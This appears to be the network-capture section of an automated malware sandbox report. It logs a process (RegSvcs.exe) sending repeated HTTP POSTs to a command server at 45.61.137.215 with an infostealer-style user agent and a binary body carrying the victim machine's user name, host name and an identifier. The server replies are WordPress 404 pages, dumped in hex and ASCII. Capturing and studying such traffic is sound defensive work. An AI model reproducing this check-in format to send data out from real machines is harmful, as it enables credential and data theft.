                                            Date: Wed, 29 May 2024 13:42:53 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:55.411254883 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:42:55.411458015 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:42:55.411468983 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:42:55.411509037 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:42:55.411528111 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:42:55.411976099 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:55.412039995 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:42:55.412049055 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:42:55.412059069 CEST1236INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.94973145.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:55.680526018 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:55.685503006 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:58.199522972 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:56 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:58.199584007 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:42:58.199594021 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:42:58.199604988 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:42:58.199615002 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:42:58.199671984 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:58.199686050 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:42:58.199697971 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:42:58.199870110 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:42:58.199879885 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            18192.168.2.94973245.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:58.351208925 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:58.356198072 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:00.920340061 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:58 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:00.920352936 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:43:00.920371056 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:43:00.920382023 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:43:00.920449018 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:43:00.920459032 CEST1236INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:43:00.920469046 CEST1236INData Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31
                                            Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
                                            May 29, 2024 15:43:00.920485020 CEST1120INData Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72
                                            Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
                                            May 29, 2024 15:43:00.920576096 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:00.920586109 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
